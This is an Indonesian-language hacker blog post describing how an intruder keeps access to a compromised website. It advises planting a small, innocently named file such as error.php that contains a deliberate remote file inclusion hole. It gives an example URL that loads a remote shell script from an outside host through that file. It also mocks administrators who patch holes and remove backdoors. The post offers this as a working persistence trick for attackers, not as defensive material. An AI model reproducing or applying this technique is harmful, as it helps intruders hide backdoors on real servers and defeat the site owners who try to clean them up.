yang master ngga usah baca
nah gini nich...
okeh langsung ajah
kalo pas dapet target RFI naluri temen-temen pasti yang pertama langsung pasang backdoor
dan patch bugnya.
kalo ngga langsung buru-buru ke /tmp trus utak atik di situ :p
trik untuk menghidari mafia tukang patch bug dan tukang delete backdoor orang
yang kita singkat namanya menjadi (MTPBDTDBO)
xixixxi chain_loader banget :p
nah jadi kepikiran kalo bugnya di patch kan jadi ngga bisa masuk lagi
kenapa ngga bikin bug aja sendiri :p
dengan asumsi para MTPBDTDBO tadi selalu memperhatikan ukuran file dan nama file yang mencurigakan
langsung aja pas giliran kita dapet kesempatan upload atau cread file
langsung bikin nama file yang ngga mencurigakan misal
error.php atau terserah kalian lah yang kira-kira menurut kalian nagga mencurigakan
kita contohkan dengan error.php
nah kita isi filenya dengan bug RFI
nah kan kita sekarang punya file backdoor dengan ukuran yang tidak mencolok alias sangat kecil
cara pakainya seperti inject RFI seperti biasa
error.php?error= << inject pake shell kamu
misal:
http://kecemplungkalen.co.cc/error.php?error=http://webtempat.in/inject_kamu.txt???
dan kita ahirnya punya backdoor yang ngga mencurigakan dan semoga awet sampai anak cucu kita
pesan buat mafia tukang patch bug dan tukang delet backdoor orang (MTPBDTDBO)
sadarlah kalian wahai tukang delete backdor orang
salam
kecemplungkalen
tanks:
Tuhan YME
istri & anakku
http://serverisdown.org and MainHack Enterprise
temen-temen di dal.net semua
#serverisdown #mainhack #gang11 #surabaya-undercover #indonesiacoder
http://kecemplungkalen.co.cc
referensi artikel saya
http://c3b0n9.blogspot.com/2008/11/simple-php-server-backdoor.html
No comments:
Post a Comment